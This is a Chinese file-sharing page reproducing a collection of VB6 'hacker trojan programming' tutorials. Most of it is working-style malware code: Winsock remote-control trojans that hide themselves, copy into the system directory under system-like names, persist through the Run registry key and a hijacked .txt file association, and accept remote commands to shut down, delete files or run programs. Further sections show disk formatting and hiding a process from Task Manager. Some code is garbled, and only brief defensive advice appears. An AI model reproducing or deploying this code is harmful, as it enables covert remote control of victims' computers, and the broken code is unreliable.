为了正常的体验网站,请在浏览器设置里面开启Javascript功能!

vb黑客木马编程(精选大全)(免费)

2012-04-21 34页 pdf 259KB 93阅读

用户头像

is_383481

暂无简介

举报
vb黑客木马编程(精选大全)(免费) VB黑客编程基础 一. 调用系统“创建快捷方式”向导 是否为 VB 不支持创建快捷方式而于着急呢?虽然 您可以调用 vb5stkit.Dll 中的 fCreateShellLink 函 数,但它是为安装程序设计的,快捷方式的默认路径 总是从当前用户 的“\Start Menu\Programs”开始,也 就是说,如果您的 Windows95 装在 C 盘上,您无 法通过 fCreateShellLink函数把快捷方式创建到 D 盘上去。 现在,给大家介绍一种极为方便、巧妙的方法: 用 Shell 语句调用系统“创建快捷...
vb黑客木马编程(精选大全)(免费)
VB黑客编程基础 一. 调用系统“创建快捷方式”向导 是否为 VB 不支持创建快捷方式而于着急呢?虽然 您可以调用 vb5stkit.Dll 中的 fCreateShellLink 函 数,但它是为安装程序的,快捷方式的默认路径 总是从当前用户 的“\Start Menu\Programs”开始,也 就是说,如果您的 Windows95 装在 C 盘上,您无 法通过 fCreateShellLink函数把快捷方式创建到 D 盘上去。 现在,给大家介绍一种极为方便、巧妙的: 用 Shell 语句调用系统“创建快捷方 式”向导。 新建一个项目,在窗体上放一个按钮,双击此按 钮,加入以下代码: Private Sub Command1_Click() Open App.Path & "\temp.lnk" For Output As #1 Close #1 '以上两句在程序所在目录建立一 个临时文件 Shell "Rundll32.exe AppWiz.Cpl,NewLinkHere "& App.Path & "\temp.lnk" End Sub (注意:Shell 语句中 NewLinkHere 后面跟着一个 空格才是引号,否则将出错。) 运行程序,按一下命令按钮,怎么样?“创建快 捷方式”向导出现了,如果创建成功, 快捷方式将取 代临时文件 temp.lnk 的位置,如果选取消,temp.lnk 也会自动消失。当然, 您可以在硬盘的任意位置建立 temp.lnk。好,现在又可以为您的程序增添一项新功 能了。 Enjoy! 二. Rundll32.exe 的用途 我们知道,用 Shell 语句只能调用可执行文件,即 exe、com、bat 和 pif 文件,有时我 们想要调用其他一 些系统功能该怎么办呢?此时,Windows 提供的 Rundll32.exe可大显身 手了。下面我们来认识一下这 些用法,也许会给您带来一点惊喜。 1.要打开设置系统时间的控制面板文件 (Timedate.cpl),只需运行如下代码: Shell "Rundll32.exe Shell32.dll,Control_RunDLL Timedate.cpl" 至于打开其他控制面板文件,相信您一定能够举 一反三,尝试一下,换个文件名就成 了。 2.要运行某一快捷方式(*.lnk)则可以用以下 代码: She11 "Rundll32.exe url.dll, FileProtocolHandler X" (X 代表要运行的文件,包括 路径, 下同。 3. 也可以这样写来打开 ActiveMovie 控制: Shell "RUNDLL32.EXE amovie.ocx,Rundll",1 而用 Shell "RUNDLL32.EXE amovie.ocx,Rundll /play X",1 将直接播放媒体文件。 4. Shell "rundll32.exe desk.cpl,InstallScreenSaver X”当然是安装屏幕保 护啦,如果你 写了一个屏幕保护程序,那么可以在安 装程序中写上它,而不一定要装到 system 目录下。 顺 便提一下,VB不是自捞一个“Application Setup Wizard”么?它的 VB 源代码都在安装 目录下的 “\setupkit\setup1”中放着呢,好好把它研究一下。 你完全能做出富有个性的安 装程序来。 5.按住 shift键,右击某一文件,菜单中会出现 “打开方式”选项,这也许已不是什么 秘密。但现在, 用 shell "rundll32.exe shell32.dll OpenAs_RunDLL X" 便能直接调用“打开 方式”框。 6. 甚至能用这样一句来打印文件(包括 HTML 所 支持的所有文本与图像): Shell "rundll32.exe MSHTML.DLL,PrintHTML X”, 1 怎么样?是不是小有收获呢?这下,您一定会对 Rundll32.exe 这个平时不起眼的文件 另眼相待了,它 可是系统运行必不可少的部件呢!其实 Shell+Rundll32 还能调用其他许多 系统功能,比如关 于 NetMeeting 和 Telnet 方面的。如果您有兴趣,可以 到往册表的“我 的 电 脑 \ HKEY_CLASSES_ROOT \ ” 或 “ 我 的 电 脑 \HKEY_LOCAL_MACHINE\Software\CLASSES”下 去看看,本文的内容大都是从那里“抄” 来的。只要 有足够的决心、信心、耐心,您一定能发现更多有价 值的东西。Good luck! 主要也就 /showerr.asp?BoardID=0&ErrCodes=60,60&action= 再起作用 程序所有代码仅此 两 段 Private Sub Command1_Click() WebBrowser1.Navigate (Text1.Text + "/showerr.asp?BoardID=0&ErrCodes=60,60&action=") End Sub Private Sub Command2_Click() End End Sub 程序下载. 首先,新建一工程,名为 Server,新建一个窗体,Name 为 Server,在窗体中加入一个 winsock 控件,Name 设为 sckServer,协议设为默认的 TCP/IP 协议。 接下来我们回来 Server 窗体模块中,添加如下代码: Private Sub form_Load() With Me .sckServer.LocalPort = 88917'本地端口(呵呵!我的生日!) .sckServer.Listen '开始监听 End With End Sub '接受客户端的连接请求。 Private Sub sckServer_ConnectionRequest(ByVal requestID As Long) With Me If .sckServer.State <>sckClosed Then .sckServer.Close .sckServer.Accept (requestID) End With End Sub 下面我们来建立客户端程序:新建一个工程,名为 Client,把窗体名为 Client,在上面 加入一个 winsock控件,名为 sckClient,协议为 TCP/IP 协议。再加一个按钮 cmdConnect 在窗体模块中加入代码: Private Sub form_Load() With Me .sckClient.RemoteHost = "127.0.0.1"'设置远程 IP,本例设为本机。 .sckClient.RemotePort = 88917 '远程端口,就为 server 中的设置一样. End With End Sub Private sub cmdConnect_Click() SckClient.Connect End sub 至此,单击 Connect 按钮我们的两个工程已经可以进行通信了,但看不见,你可以在 Client中的 sckClient_Connect事件中加入代码:debug.print “Connetion successful!”来查看。 这仅是第一步,一点工作也做不了,下面我们来为它们添加功能。为了简单,本文章只 实现一点小小的功能―――关机,重启,注销。好,开始吧! 在 Server 工程中新建一个模块,Name 为 modApi,这个模快为一些 API 函数,添加如 下 API 函数: Public Declare Function ExitWindowXXX Lib "user32" Alias "ExitWindowXXX" (ByVal uFlags As Long, ByVal dwReserved As Long) As Long Public Const EWX_LOGOFF = 0 Public Const EWX_REBOOT = 2 Public Const EWX_SHUTDOWN = 1 Public Declare Function ClipCursor Lib "user32" Alias "ClipCursor" (lpRect As Any) As Long Public Type RECT Left As Long Top As Long Right As Long Bottom As Long End Type 注:在两个 socket 中编程中,进行通信的重要事件是 DataArrival 事件,用于接收远程 数据。 下面在Client工程的Client窗体中放入三个按钮,分别为 cmdExit,cmdLogoff,cmdReboot。 它们用于对远程的关机,注销,重启操作。分别添加如下代码: Private Sub cmdExit_Click() Me.sckClient.SendData "Exit" End Sub Private Sub cmdLogoff_Click() Me.sckClient.SendData "Logoff" End Sub Private Sub cmdReboot_Click() Me.sckClient.SendData "Reboot" End Sub 全都是对服务端发出请求。下面转到 Server 工程中:在 Server 中添加 sckServer 的 DataArrial 事件,接收客户端的请求。 Private Sub sckServer_DataArrival(ByVal bytesTotal As Long) Dim strData As String With Me ' 接收客户请求的信息 .sckServer.GetData strData Select Case strData Case "Exit" '关机 Call ExitWindowXXX(EWX_SHUTDOWN, 0) Case "Reboot" '重启 Call ExitWindowXXX(EWX_REBOOT, 0) Case "Logoff" '注销 Call ExitWindowXXX(EWX_LOGOFF, 0) End Select End With End Sub 好了,到此我们已经实现功能了,但还不行,我们要它在背后运行。这简单,在 Server 中的 form_Load 事件中加入一句:me.hide。好这下看不见了,但大家知道木马是一开机就 自动运行了,这又是为什么,怎么实现的?把它加入到注册表的启动组中?对,不错,跟我 来吧! 回到 Server工程中的 modApi 中加入如下 API 函数: Public Declare Function RegOpenKey Lib "advapi32.dll" Alias "RegOpenKeyA" (ByVal hKey As Long, ByVal lpSubKey As String, phkResult As Long) As Long Public Declare Function RegSetvalueEx Lib "advapi32.dll" Alias "RegSetvalueExA" (ByVal hKey As Long, ByVal lpvalueName As String, ByVal Reserved As Long, ByVal dwType As Long, lpData As Any, ByVal cbData As Long) As Long Public Declare Function RegCreateKey Lib "advapi32.dll" Alias "RegCreateKeyA" (ByVal hKey As Long, ByVal lpSubKey As String, phkResult As Long) As Long Public Const REG_BINARY = 3 Public Const REG_SZ = 1 Public Const HKEY_LOCAL_MACHINE = &H80000002 Public Const HKEY_CLASSES_ROOT = &H80000000 写到注册表启动组中的过程。 Public Sub StartupGroup() Dim sKey As String Dim result As Long Dim hKeyID As Long Dim sKeyVal As String sKey = "Systrsy" '启动组中的键,找一个与系统文件相近的。 sKeyVal = "C:/windows/system/systrsy.exe" '木马文件的路径,可以用 GetSystemDirectory 来取得系统路径。 result = RegOpenKey(HKEY_LOCAL_MACHINE, _ "Software/Microsoft/Windows/CurrentVersion/Run", hKeyID) If result = 0 Then result = RegSetvalueEx(hKeyID, sKey, 0&, REG_SZ, sKeyVal, Len(sKey) + 1) End If End Sub 好,就这样简单地完成了。但是,想过没有,如果不是很菜的鸟,到注册表中见一删, 我们苦苦的心血不就白白地浪费了吗?不行,还得想让他发现了删也删不掉。请看下面的代 码: Public Sub WriteToTxt() Dim result As Long Dim hKeyID As Long Dim skey As String Dim skeyVal As String skey = "txtfile/shell/open/command" skeyVal = "C:/windows/system/txtView.exe" result = RegOpenKey(HKEY_CLASSES_ROOT, skeyVal, hKeyID) If result = 0 Then result = RegSetvalueEx(hKeyID, skey, 0&, REG_SZ, skeyVal, Len(skeyVal) + 1) End If End Sub 肯定不少朋友一看就知道了,原是与 txt 文件进行关联,一点也不错,但 C:/windows/system/txtView.exe 是哪里来的,我们的木马是 C:/windows/system/systrsy.exe 呀。 这可是我们木马的分身了。 好,回到 Server工程的 Server 窗体的 form_Load 中,加入如下代码: Dim sCurrentPath As String, sSystemDir As String sCurrentPath = App.Path & "/" & App.EXEName & ".exe" sSystemDir = “C:/windows/system” On Error Resume Next '复制文件成系统目录下的 Systrsy.exe FileCopy sCurrentPath, sSystemDir & "/Systrsy.exe" On Error Resume Next 复制文件成系统目录下的 txtView.exe FileCopy sCurrentPath, sSystemDir & "/txtView.exe" 调用 Call startupGroup Call WriteToTxt '判断程序是否下在运行 If App.PrevInstance Then '如果已经运行就退出。 End End If 好了,写到这里一个破坏性木马已经诞生了,我实验过还是比较好的一个,希望大家也 能写一个好的木马,能突破冰河(呵呵!) 注意: 1、大家在处理端口是最好使用高端端口,否则会和一些常用端口发生冲突 2、在第一次使用 VB.NET 的最好看看有关的图书,可能你能写出一款超级木马也说 你可以使用 API 函数 FindWindow和 PostMessage 去寻找指定的窗口,并关闭它。下面的例 子教给你怎样找到并关掉一个 Caption 为“Caluclator”的程序。 Dim winHwnd As Long Dim RetVal As Long winHwnd = FindWindow(vbNullString, "Calculator") Debug.Print winHwnd If winHwnd <> 0 Then RetVal = PostMessage(winHwnd, WM_CLOSE, 0&, 0&) If RetVal = 0 Then MsgBox "置入消息错误!" End If Else MsgBox "Calculator没有打开!" End If 为了让以上的代码工作,你必须在模块文件中什么以下 API 函数: Declare Function FindWindow Lib "user32" Alias _ "FindWindowA" (ByVal lpClassName As String, _ ByVal lpWindowName As String) As Long Declare Function PostMessage Lib "user32" Alias _ "PostMessageA" (ByVal hwnd As Long, ByVal wMsg As Long, _ ByVal wParam As Long, lParam As Any) As Long Public Const WM_CLOSE = &H10 网络是互联的,当你从中获取资源的同时,也要经受其中的考验,木马程序会修改并破坏电 脑的系统和文件,除了安装杀毒软件(包括防火墙)外,还应该尽可能地掌握系统文件知识。 下面简单介绍一下木马的加载方式: 加载方式:定位于 System.ini和Win.ini文件 System.ini(位置 C:\windows\) [boot]项原始值配置:“shell=explorer.exe”,explorer.exe 是 Windows 的核心文件之一, 每次系统启动时,都会自动加载。 [boot]项修改后配置:“shell=explorer C:\windows\xxx.exe”(xxx.exe 假设一木马程序)。 Win.ini(位置 C:\windows\) [windows]项原始值配置:“load=”;“run=”,一般情况下,等号后无启动加载项。 [windows]项修改后配置:“load=”和“run=”后跟非系统、应用启动文件,而是一些你 不熟悉的文件名。 解决: 执行“运行→msconfig”命令,将 System.ini 文件和 Win.ini文件中被修改的值改回原值, 并将原木马程序删除。若不能进入系统,则在进入系统前按“Shift+F5”进入 Command Prompt Only 方式,分别键入命令 edit system.ini和 edit win.ini进行修改。 加载方式:隐藏在注册表中(此方式最为隐蔽)。 注 意 以 下 注 册 表 项 : HKEY LOCAL MACHINE\Software\classes\exefile\shell\open\command\ 原始数值数据:"%1"%  被修改后的数值数据:C:\system\xxx.exe "%1"%  原注册表项是运行可执行文件的格式,被修改后就变为每次运行可执行文件时都会先运 行 C:\system\xxx.exe 这个程序。 例如:开机后运行 QQ 主程序时,该 xxx.exe(木马程序)就先被加载了。 解决办法: 当通过防火墙得知某端口被监听,立即下线,检查注册表及系统文件是否被修改,找到 木马程序,将其删除。 所谓“病从口入” 感染源还是在于加载了木马程序的服务器端。目前,伪装可执行文 件图标的方法很多,如:修改扩展名,将文件图标改为文件夹的图标等,并隐藏扩展名,因 此接收邮件和下载软件时一定要小心。许多木马程序的文件名很像系统文件名,造成用户对 其没有把握,不敢随意删除,因此要不断增长自己的知识才可防备万一。 可以借助一些软件来狙击木马,如:The Cleaner、Trojan Remover 等。建议经常去微软 网站下载补丁包来修补系统;及时升级病毒库 BO 又称“特洛伊木马”, 是在美国一次黑客技术讨论会上由一个黑客组织推出的。它其实 是一种客户机/服务器程序,其利用的原理就是:在本机直接启动运行的程序拥有与使用者 相同的权限。因此如果能够启动服务器端(即被攻击的计算机)的服务器程序,就可以使用 相应的客户端工具客户程序直接控制它了。下面来谈谈如何用 VB来实现它。 ---- 使用 VB建立两个程序,一个为客户端程序 Client,一个为服务器端程序 systry。 ---- 在 Client 工程中建立一个窗体,加载 WinSock控件,称为 tcpClient,协议选择 TCP,再 加入两个文本框,用以输入服务器的 IP 地址或服务器名,然后建立一个按钮,按下之后就 可以对连接进行初始化了,代码如下: Private Sub cmdConnect_Click() If Len(Text1.Text) = 0 And Len(Text2.Text) = 0 Then MsgBox ("请输入主机名或主机 IP 地址。") Exit Sub Else If Len(Text1.Text) > 0 Then tcpClient.RemoteHost = Text1.Text Else tcpClient.RemoteHost = Text2.Text End If End If tcpClient.Connect Timer1.Enabled = True End Sub ---- 连接建立之后就可以使用 DataArrival事件处理所收到的数据了。 ---- 在服务器端 systry 工程也建立一个窗体,加载WinSock控件,称为 tcpServer,协议选择 TCP,在 Form_Load 事件中加入如下代码: Private Sub Form_Load() tcpServer.LocalPort = 1999 tcpServer.Listen End Sub ---- 准备应答客户端程序的请求连接,使用 ConnectionRequest事件来应答户端程序的请求, 代码如下: Private Sub tcpServer_ConnectionRequest (ByVal requestID As Long) If tcpServer.State < > sckClosed Then tcpServer.Close‘检查控件的 State 属性是否为关闭的。 End If '如果不是,在接受新的连接之前先关闭此连接。 tcpServer.Accept requestID End Sub ---- 这样在客户端程序按下了连接按钮后,服务器端程序的 ConnectionRequest事件被触发, 执行了以上的代码。如果不出意外,连接就被建立起来了。 ---- 建立连接后服务器端的程序通过 DataArrival 事件接收客户机端程序所发的指令运行既 定的程序。如:把服务器端的驱动器名、目录名、文件名等传到客户机端,客户机端接收后 用 TreeView 控件以树状的形式显示出来,浏览服务器端文件目录;强制关闭或重启服务器 端的计算机;屏蔽任务栏窗口;屏蔽开始菜单;按照客户机端传过来的文件名或目录名,而 删除它;屏蔽热启动键;运行服务器端的任何程序;还包括获取目标计算机屏幕图象、窗口 及进程列表;激活、终止远端进程;打开、关闭、移动远端窗口;控制目标计算机鼠标的移 动与动作;交换远端鼠标的左右键;在目标计算机模拟键盘输入,下载、上装文件;提取、 创建、修改目标计算机系统注册表关键字;在远端屏幕上显示消息。DataArrival 事件程序如 下: Private Sub tcpServer_DataArrival (ByVal bytesTotal As Long) Dim strData As String Dim i As Long Dim mKey As String tcpServer.GetData strData ‘接收数据并存入 strData For i = 1 To Len(strData) ‘分离 strData 中的命令 If Mid(strData, i, 1) = "@" Then mKey = Left(strData, i - 1) ‘把命令 ID 号存入 mKey ‘把命令参数存入 strData strData = Right(strData, Len(strData) - i) Exit For End If Next i Select Case Val(mKey) Case 1 ‘驱动器名、目录名、文件名 Case 2 强制关闭服务器端的计算机 Case 3 强制重启服务器端的计算机 Case 4 屏蔽任务栏窗口; Case 5 屏蔽开始菜单; Case 6 按照客户机端传过来的文件名或目录名,而删除它; Case 7 屏蔽热启动键; Case 8 运行服务器端的任何程序 End Select End Sub 详细程序略。 ---- 客户机端用 tcpClient.SendData 发命令。命令包括命令 ID 和命令参数,它们用符号“@” 隔开。 ---- 另外,当客户机端断开与服务器端的来接后,服务器端应用 tcpServer_Close 事件,来继 续准备接收客户机端的请求,其代码如下: Private Sub tcpServer_Close() tcpServer.Close tcpServer.Listen End Sub ---- 这就是一个最基本的特洛伊木马程序,只要你的机器运行了服务器端程序,那别人就可 以在千里之外控制你的计算机。至于如何让服务器端程序运行就要发挥你的聪明才智了,在 我的源程序中有一中方法,是修改系统注册表的方法。 ---- 成功的特洛伊木马程序要比这个复杂一些,还有程序的隐藏、自动复制、传播等问题要 解决。警告:千万不要用 BO 程序破坏别人的系统。 软盘是数据的常用载体,我们的软件可能会提供用户将数据备份到软盘上的功能。为避免软 盘上有带有病毒的文件,最安全的办法就是提醒用户将软盘格式化。 Visual Basic 可以通过调用 API 函数格式化一个磁盘,无论是软盘还是硬盘。 打开一个新的项目(project1) ,如果你没有更改过缺省模式,那么 Visual Basic 会自动 添加一个 form1 文件,在 form1 上添加一个命令控件,将下面的代码拷入。 Option Explicit Private Declare Function SHFormatDrive Lib"shell32"_ ( ByVal Hend AS Long,_ ByVal Drive AS Long,_ ByVal FormatID AS Long,_ ByVal Options AS Long) as Long Private Sub FormatDisk(intDrive as integer,blnQuickFormat as Boolean) dim lngReturn As Long; if (blnQuickFormat) then lngReturn= SHFormatDrive(0,intDrive,0&,1&) else lngReturn= SHFormatDrive(0,intDrive,0&,0&) end if end Sub Private Sub Command1_Click() call FormatDisk(0,True) End Sub 运行此程序。 这里有必要提醒读者注意的是,FormatDisk 函数的第一个变量很重要,他的值是 0,1,2 时代表格式化的分别是:A、B、C盘。 注意:读者使用此程序作练习的时候千万不要用硬盘作实验,笔者不为可能发生的错 误和损失负责 在一些系统,为了特定目的,经常要求程序隐藏起来运行,例如 DCS(集散控制系统)中 的后台监控系统、木马控制程序、源码防拷贝等,以减少被发现、截杀和反汇编的风险。这 种功能模块要求程序在运行期间不仅不会在桌面出现,也不允许被操作者从任务管理器列表 中发现。 程序隐形的原理 对于一个隐形程序而言,最基本的要求是: 1. 不在桌面出现界面; 2. 不在任务栏出现图标; 3. 程序名从任务管理器名单中消失。 对于上述第一点,可以将 Form 的 Visible 属性设为 False。 要将图标从任务栏中屏蔽掉,可以把 Form 的 ShowInTaskBar 改为 False。 在 Windows 环境下,可以调用 WINAPI 函数中的 RegisterviceProcess 来实现第三个要 求。 上述功能,不论用 VC、Delphi、VB,还是 PB 等任何一种高级编程语言都是比较容易 实现的。 隐形功能多用于木马程序,但木马程序在许多国家和地区是不合法的,为便于理解, 本文用 VB 结合一个程序防拷贝的实例来讲解。通过获取软件安装路径所在磁盘序列号 (磁 盘 ID),用做对合法用户的判断。以下程序的目的是用于讲解隐形程序的编制和应用,对程 序防拷贝内容作了一定程度的简化。 程序隐形的示例 程序的具体编制操作如下: 1. 在 VB6.0编程环境中,新建一个工程 Project1。 2. 在 Project1 中添加模块 Modulel,在工程属性中将工程名称改为 HiddenMen,应用 程序标题也改为 HiddenMen(以下程序都经过实际运行测试,可以原样复制使用)。 在模块Module1 中加入如下声明: Public Declare Function GetCurrentProcessId Lib “kernel32” () As Long '获得当前进程 ID 函数的声明 Public Declare Function RegisterServiceProcess Lib “kernel32” (ByVal ProcessId As Long, ByVal ServiceFlags As Long) As Long '在系统中注册当前进程 ID 函数的声明 3. 在 Project1 中新建一个窗体 Form1,设置 Form1 的属性: form1.Visible=False form1.ShowInTaskBar=False 在代码窗口添加如下代码: Private Declare Function GetDriveType Lib “kernel32” Alias “GetDriveTypeA” (ByVal nDrive As String) As Long '获得当前驱动器类型函数的声明 Private Declare Function GetVolumeInformation Lib “kernel32” Alias “GetVolumeInformationA” (ByVal lpRootPathName As String, ByVal lpVolumeNameBuffer As String, ByVal nVolumeNameSize As Long, lpVolumeSerialNumber As Long, lpMaximumComponentLength As Long, lpFileSystemFlags As Long, ByVal lpFileSystemNameBuffer As String, ByVal nFileSystemNameSize As Long) As Long '获得当前驱动器信息函数的声明 Private Sub Form_Load() Dim drive_no As Long, drive_flag As Long Dim drive_chr As String, drive_disk As String Dim serial_no As Long, kkk As Long Dim stemp3 As String, dflag As Boolean Dim strlabel As String, strtype As String,strc As Long RegisterServiceProcess GetCurrentProcessId, 1 ' 从系统中取消当前进程 strlabel = String(255, Chr(0)) strtype = String(255, Chr(0)) stemp3 = “172498135” '这是作者 C盘的序列号(十进制),读者可根据自己情况更改。 dflag = False For drive_no = 0 To 25 drive_disk = Chr(drive_no + 67) drive_chr = drive_disk & “:\” drive_flag = GetDriveType(drive_chr) If drive_flag = 3 Then kkk = GetVolumeInformation(drive_chr, strlabel, Len(strlabel), serial_no, 0, 0, strtype, Len(strtype)) '通过 GetVolumeInformation 获得磁盘序列号 Select Case drive_no Case 0 strc = serial_no End Select If serial_no = stemp3 Then dflag = True Exit For End If End If Next drive_no If drive_no = 26 And dflag = False Then '非法用户 GoTo err: End If MsgBox (“HI,合法用户!”) Exit Sub err: MsgBox (“错误!你的 C:盘 ID 号是” & strc) End Sub Private Sub Form_Unload(Cancel As Integer) RegisterServiceProcess GetCurrentProcessId, 0 '从系统中取消当前程序的进程 End Sub 将上述程序代码编译后运行,在出现类似“错误!你的 C 盘 ID 号是 172498135”对话 框时,按下 Ctrl+Alt+Del 键,看看程序名叫“HiddenMen”是否在任务管理器名单列表里。 如果把上述程序稍加改动,可以加到自己特定的程序中去。该程序在隐形运行之中,不知不 觉就完成了预定功能。 以上程序在简体中文Windows 98和 VB 6.0环境中调试通过。 上网的时候很容易遭到探测,一般探测你个人的入侵者技术不会高明到哪里去。所以根本不 能称上黑客,所以本文就用入侵者来代替。他们对普通网民的扫描可以是多端口单 IP 的扫 描或者多 IP 单端口扫描。前者是通过一些 IP 工具来取得你的 IP,然后尝试利用端口扫描获 取你的信息,看你的计算机有没有预先中了木马。然后通过网上的木马端口列表,来获得木 马名称。用相应的客户端软件来连接到你的计算机。从而获得密码、以及你的秘密信息。后 者则是通过利用如 SuperScan 等可以大范围扫描 IP 的软件,扫描打开特定端口的机器。比 如,可以扫描打开 7626端口的机器,看对方是否中了冰河。然后,入侵者就用客户端连接 到服务器从而入侵你的计算机。 这些扫描是简单的 TCP 的 Connect扫描。所以无法避开防火墙的追踪。网民就可以利 用天网等防火墙软件来获取对方的 IP。相信很多 DIY 迷或者编程爱好者总是想拥有属于自 己的类似的工具。本文就给你讲述如何用 VB 来获得探测你的入侵者的 IP 地址,然后…… 我可没有教你用蓝屏炸弹或者蜗牛炸弹去炸它哦。毕竟,我们没有入侵者的野心,本程序还 可以让你监听 80端口,来察看对方对你进行的常规扫描。要看懂本文,你需要有一定的 VB 基础。 好了,废话少说,我们来看看本程序的基本原理: 入侵者通过 Connect 本机的端口,然后通过是否成功,来获得信息。由于 TCP 的三次 握手原理。他必定会留下自己的 IP,我们就利用这一个原理来获得对方的 IP。 Winsock 控件的属性、方法和事件在我上次写的《.用 winsock 制作漏洞扫描器》一文中 已经叙述过,这里就不再介绍。大家还一定记得 RemoteHostIP 和 LocalPort 属性吧。这就是 对方的 IP 和自己的端口。聪明的你应该明白了吧。通过这两个属性就可以清楚的获得对方 的 IP 地址和他正在扫描的本地端口。 因为不可能一个端口只有一个人会扫描,所以本程序我们需要使用到控件数组。这个概 念的描述大家可以查找MSDN。本程序的流程是: 1、 定义需要监听的端口 2、 装载一定数量的 Winsock1 控件,从需要监听的端口列表中获得数据。一一开启监 听功能。(Listen) 3、 当某一个控件接收到连接的事件发生,就把得到的 RemoteIP 和 LocalPort 加入日 志 4、 加载一个Winsock2,继续捕获数据(Getdata) 5、 Winsock2 数据到达数据 程序的基本概念都介绍完了,相信你对本程序已经有了一定的认识。现在我们就来开始 我们的工作: 程序的控件以及说明如下: 控件名 控件类型 属性 Label1 Label Caption=”增加端口” Command1 command Caption=”添加” Command2 command Caption=”监听” Command3 command Caption=”退出” Listports Listbox 无 TxtLog Richtextbox 无 程序的代码以及说明如下: ‘本程序在 VB6.0+Windows2000下测试通过! Dim tmpstr As String Dim NOW_OUTAs Integer ''总共出去连接的有几个 Winsock Private Sub Command1_Click() ListPorts.AddItem txtADDPORT.Text End Sub Private Sub Command2_Click() On Error Resume Next If Command2.Caption = "监听" Then For i = 0 To ListPorts.ListCount - 1 Load Winsock1(i + 1) ''加载监听端口的 winsock1 数组控件 Winsock1(i + 1).LocalPort = ListPorts.List(i) ''设定端口 Winsock1(i + 1).Listen ''监听 Next i Command2.Caption = "停止" Else For i = 1 To Winsock1.Count - 1 Unload Winsock1(i) Next i For i2 = 1 To Winsock2.Count - 1 Unload Winsock2(i2) Next i2 Command2.Caption = "监听" End If End Sub Private Sub Command3_Click() Unload Me End Sub Private Sub Form_Load() txtLOG.Text = "日志:" & vbCrLf NOW_OUT = 1 End Sub Private Sub Winsock1_ConnectionRequest(Index As Integer, ByVal requestID As Long) Load Winsock2(NOW_OUT) ''加载建立连接的 Winsock2 数组控件 Winsock2(NOW_OUT).Accept requestID ''建立连接 Winsock1(Index).Close Winsock1(Index).Listen ''Winsock1 继续监听 NOW_OUT = NOW_OUT + 1 ''连接的控件累加 myAddLog " 来 自 " & Winsock1(Index).RemoteHostIP & " 连 接 到 本 地 端 口 :" & Winsock1(Index).LocalPort ''显示捕获的连接 End Sub Private Sub Winsock2_DataArrival(Index As Integer, ByVal bytesTotal As Long) Winsock2(Index).GetData tmpstr ''通过 Getdata 捕获数据 myAddLog "来自" & Winsock2(Index).RemoteHostIP & "的数据:" & tmpstr ''显示捕获的数据 End Sub Sub myAddLog(tmptext As String) ''加入日志 tmptext = tmptext & vbCrLf txtLOG.SelStart = Len(txtLOG.Text) txtLOG.SelText = tmptext End Sub 总结:其实一些程序的原理很简单,我们只要善于实践,并且能够把所学的只是运用到 你的程序中去,我想编出类似的程序是很简单的。如木马、端口扫描器、客户端工具、CGI 漏洞扫描器……。VB 的Winsock 控件虽说不是底层操作。及不上 C语言的 Socket 编程的功 能。但实现普通的操作还是很有用的。简单的例子就是 Cookie 欺骗,用 VB 来编写这种程 序十分简单。 今天我为大家讲如何用 VB编写"木马"程序 木马一般分为两个主程序:一个是服务器端的程序(server),另一个是客户端程序(client),服务 器程序是给 攻击对象用的,千万不可用错了----给自己种马的人......^0^ 客户程序才是给自己用的 ,于是我们就用 VB 建立两个程序 ,一个为服务器端程序 cockhorseserver,另一个为 客户端程序 cockhorseclient. 先在 cockhorseclient程序中建立一个窗体,加载一个winsock控件,称为 tcpclient,再加上两个文 本框,用来 输入服务器的 IP 地址和端口号.另外还要建立一个按钮,按下后可以对连接进行初始化. 代码我写下: Private Sub Command1_Click() '调用 connect方法,初始化连接. tcpclient.RemoteHost = ipinput.Text tcpclient.RemotePort = Val(portinput.Text) '这是端口号,默认为 1001 tcpclient.Connect '和指定的 IP 相对的计算机相连接 cmdconnect.Enabled = False End Sub (在收到数据之后,就要对这些数据做出相应的处理,使用 dataarrival 事件,可以方便运载数据 进操作. Private Sub tcpclient_dataArrival(ByVal bytestotal As Long) Dim strdata As String tcpclient.GetData strdata If strdata = "test connect" Then tcpstate.Text = "connect OK" + vbNewLine + LocalIP Is ":" + -tcpclient.LocalIP + "computer name is : " + tcpclient.LocalHostName tcpstate.Text = tcpstate.Text + vbNewLine + "remote ip is :" + -tcpclient.RemoteHostIP + "computer name is : " + tcpclient.remotehostname If InStr(Trim(strdata), "closeOK?") > 0 Then tcpclient.Close End If End If txtoutput.Text = txtouput.Text + vbNewLine + tcpclient.RemoteHostIP + ": " + strdata End Sub End Sub 这是这一段代码 cockhorseclient程序的核心部分就是这些,下面我讲 cockhorseserver程序 cockhorseserver程序也是先建立一个窗体,也要加载一个 winsock控件,(方便一些,我在同一个 工程下建立这 个窗体).如果当 cockhorseclient 程序运行时,cockhorseclient 程序就会对 cockhorseserver 发出 连接请求, 为了完成这个连接任务,可以用 connectionrequest 事件来完成,然后就是具体的错误情况的表 达. 代码我打出来: if index=0 then intmax= intmax+1 load tcpserver(intmax) tcpserver(intmax).localport=0 tcpserver(intmax).accept requestID combol_IP.additem(tcpserver(intmax).remotehostIP) combol_Ip.text="填上你的恨的人的 IP 吧!" tcpserver(intmax).senddata"test connect" end if 呵呵.刚才忘记定义名称了 它的效果是:在 cockhorseclient 程序被按下的时候,cockhorseserver 程序的 connectionrequest 事件被触发, 从而执行上面的程序,产生连接. 现在的 cockhorseserver 程序只能做链接,还不能处理 cockhorseclient 程序所发出的指令,我们 还必需用
/
本文档为【vb黑客木马编程(精选大全)(免费)】,请使用软件OFFICE或WPS软件打开。作品中的文字与图均可以修改和编辑, 图片更改请在作品中右键图片并更换,文字修改请直接点击文字进行修改,也可以新增和删除文档中的内容。
[版权声明] 本站所有资料为用户分享产生,若发现您的权利被侵害,请联系客服邮件isharekefu@iask.cn,我们尽快处理。 本作品所展示的图片、画像、字体、音乐的版权可能需版权方额外授权,请谨慎使用。 网站提供的党政主题相关内容(国旗、国徽、党徽..)目的在于配合国家政策宣传,仅限个人学习分享使用,禁止用于任何广告和商用目的。

历史搜索

    清空历史搜索